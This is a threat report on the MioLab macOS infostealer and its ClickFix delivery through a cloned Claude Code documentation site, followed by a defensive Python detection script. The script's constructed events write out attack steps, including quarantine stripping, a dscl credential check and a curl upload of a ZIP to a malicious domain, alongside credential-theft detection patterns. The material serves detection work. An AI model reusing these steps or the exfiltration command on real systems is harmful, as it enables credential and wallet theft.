A sophisticated macOS infostealer named MioLab, also known as Nova, has rapidly emerged as one of the most advanced Malware-as-a-Service (MaaS) platforms targeting Apple users. Advertised on Russian-speaking underground forums, MioLab marks a significant shift in the threat landscape, demonstrating that macOS is no longer a low-risk target for cyber attackers. As Apple’s market share continues to grow among professionals, including software engineers, executives, and cryptocurrency investors, Macs are increasingly being treated as highly profitable attack surfaces by malicious actors.
The malware itself is characterized by a user-friendly web panel and a compact C payload that compiles to approximately 100 KB. This lean design aids in evading basic signature-based antivirus detection. MioLab supports both Intel x86-64 and Apple Silicon ARM64 architectures and functions across macOS versions from Sierra through Tahoe. Its core capabilities include the theft of browser credentials, draining of cryptocurrency wallets, harvesting of passwords from password managers, and general file collection. Furthermore, a premium add-on module specifically targets hardware wallets like Ledger and Trezor, with the alarming ability to steal a victim’s 24-word BIP39 recovery seed phrases.
MioLab’s Evolving Arsenal and Delivery Tactics
MioLab is identified by LevelBlue analysts as a rapidly evolving threat whose development pace is unusually fast for an infostealer. Reviewing changelogs up to February 2026, researchers confirmed critical upgrades. These include a significantly rebuilt hardware wallet extraction module, the capability to decrypt Apple Notes directly on the device, a functional Safari cookie grabber, and a comprehensive Team API. This API allows criminal teams to programmatically generate payloads and download stolen logs without needing to log into the main web panel. The platform also integrates Telegram bot binding, providing real-time victim notifications and serving organized cybercriminal affiliates, often referred to as “traffers.”
Infrastructure analysis has revealed that MioLab’s operators are involved in a broader cybercrime ecosystem. The malware’s administration panel was previously hosted on playavalon[.]org. This domain has since been rotated to serve an Ethereum token airdrop phishing campaign, effectively converting residual traffic from old indicators into fresh fraudulent activity. Both of these operations can be traced back to FEMO IT Solutions Ltd., a bulletproof hosting provider operating under the Defhost brand, which is known for shielding multiple malware families from law enforcement scrutiny.
ClickFix Delivery: Exploiting User Trust Through the Terminal
One of MioLab’s most notable recent additions is its ClickFix infection chain. This technique is designed to trick victims into executing malicious commands directly within their macOS Terminal application. The malware’s panel features a one-click utility where operators can input their server credentials. The system then instantly generates a Terminal payload ready for deployment. This payload can be distributed through deceptive methods such as fake CAPTCHA pages or cloned developer portals.
Shortly before this report’s publication, security researcher Marcelo Rivero identified a live malvertising campaign actively distributing MioLab. This campaign employed a convincing clone of the documentation site for Claude Code, a legitimate command-line AI tool developed by Anthropic. The campaign was meticulously crafted for high-value targets, particularly developers who are already accustomed to running commands in the Terminal. For Windows visitors, the cloned site presented entirely legitimate installation instructions, appearing perfectly benign upon casual inspection.
However, for macOS users, the site delivered a ClickFix-style payload. The initial stage of the infection relies on a Base64-masked URL; once the command is decoded and executed, it launches a curl loader. This loader fetches the Mach-O payload, drops it into the /tmp directory, and then executes an `xattr -c` command. This command strips Apple’s Quarantine attribute, thereby bypassing the Gatekeeper security feature of macOS.
Once past Gatekeeper, the malware proceeds to terminate any open Terminal windows. It then presents a fake System Preferences password dialog, generated via AppleScript, which effectively tricks users into entering their login credentials. The captured password is subsequently verified against the local directory service using the `dscl` utility. Upon successful verification, MioLab commences its data exfiltration process. This includes collecting browser cookies, stored passwords, cryptocurrency wallet files, Apple Notes, Telegram session data, and documents from the user’s Desktop and Downloads folders. Finally, all collected data is compressed into a ZIP archive and uploaded to the attacker’s command-and-control server.
To defend against MioLab and similar threats, both individual users and security teams must implement robust protective measures. Users need to be educated to question any unexpected password prompts, especially those appearing from applications that were recently downloaded or are not from trusted sources. Security teams should focus on blocking or closely monitoring the use of sensitive system utilities, such as `dscl`, `osascript`, and `system_profiler`, particularly when they are invoked by unsigned applications. Access to browser profile directories and the macOS Keychain file `login.keychain-db` should be strictly audited. Furthermore, known malicious domains, including `socifiapp[.]com`, must be blocked, and any suspicious `curl` POST requests directed towards external APIs should be flagged and thoroughly investigated.
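The monitoring recommendations above can be expressed as simple detection rules. The following Python script is an added example (not code from LevelBlue or the report) that runs those rules over a handful of constructed endpoint telemetry events whose JSON field names are assumed for this illustration; it flags the sensitive utilities when spawned by unsigned or temp-directory parents, quarantine-attribute removal, credential-store access by untrusted processes, and curl uploads to untrusted or blocked domains.

```python
import json
import re
from urllib.parse import urlparse
# Constructed telemetry (JSON lines) modelled on the chain described above; not real captured data.
# exec events carry the spawned utility plus its parent's path and signing state; file_open events carry the accessor.
SAMPLE_EVENTS = """\
{"type":"exec","exe":"/usr/bin/xattr","args":["xattr","-c","/tmp/update"],"parent_exe":"/bin/zsh","parent_signed":true}
{"type":"exec","exe":"/usr/bin/osascript","args":["osascript","-e","display dialog ..."],"parent_exe":"/tmp/update","parent_signed":false}
{"type":"exec","exe":"/usr/bin/dscl","args":["dscl","localhost","-read","/Local/Default/Users/alice"],"parent_exe":"/tmp/update","parent_signed":false}
{"type":"file_open","exe":"/tmp/update","path":"/Users/alice/Library/Keychains/login.keychain-db"}
{"type":"file_open","exe":"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome","path":"/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"}
{"type":"exec","exe":"/usr/bin/curl","args":["curl","-X","POST","-F","file=@/tmp/out.zip","https://api.socifiapp.com/upload"],"parent_exe":"/tmp/update","parent_signed":false}
{"type":"exec","exe":"/usr/bin/curl","args":["curl","-sS","https://example.org/"],"parent_exe":"/bin/zsh","parent_signed":true}
"""

SENSITIVE_UTILS = {"dscl", "osascript", "system_profiler"}   # utilities named in the report
BLOCKED_DOMAINS = {"socifiapp.com"}                          # socifiapp[.]com from the report, refanged
UPLOAD_FLAGS = {"-X", "--request", "-d", "--data", "--data-binary", "-F", "--form", "-T", "--upload-file"}
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/")
CREDENTIAL_PATHS = re.compile(r"login\.keychain-db$|/Library/Application Support/(Google/Chrome|Firefox|BraveSoftware)/|/Library/Cookies/")
TRUSTED_ACCESSORS = ("/Applications/Google Chrome.app/", "/Applications/Firefox.app/", "/System/", "/usr/libexec/")

def analyse(event):
    # Return the alert strings raised by one telemetry event (empty list if benign).
    alerts = []
    exe = event.get("exe", "")
    tool = exe.rsplit("/", 1)[-1]
    if event["type"] == "exec":
        args = event.get("args", [])
        parent = event.get("parent_exe", "")
        untrusted = not event.get("parent_signed", True) or parent.startswith(TEMP_DIRS)
        if tool in SENSITIVE_UTILS and untrusted:
            alerts.append(f"{tool} spawned by unsigned or temp-dir parent {parent}")
        if tool == "xattr" and "-c" in args:   # quarantine attribute cleared, as in the ClickFix loader
            alerts.append("quarantine attribute cleared: " + " ".join(args))
        if tool == "curl":
            hosts = {urlparse(a).hostname or "" for a in args if a.startswith(("http://", "https://"))}
            if any(h == d or h.endswith("." + d) for h in hosts for d in BLOCKED_DOMAINS):
                alerts.append("curl to blocked domain " + ",".join(sorted(hosts)))
            elif UPLOAD_FLAGS & set(args) and untrusted:
                alerts.append("curl upload from untrusted parent to " + ",".join(sorted(hosts)))
    elif event["type"] == "file_open":
        path = event.get("path", "")
        if CREDENTIAL_PATHS.search(path) and not exe.startswith(TRUSTED_ACCESSORS):
            alerts.append(f"credential store {path} opened by {exe}")
    return alerts

def scan(jsonl):
    # Run analyse() over every JSON line and return the flat list of alerts.
    return [a for line in jsonl.splitlines() if line.strip() for a in analyse(json.loads(line))]
```

Running `scan(SAMPLE_EVENTS)` yields five alerts for the constructed events (the signed Chrome cookie read and the plain signed curl fetch stay silent); in production the allowlists would be tuned to the fleet's own browsers and management tooling.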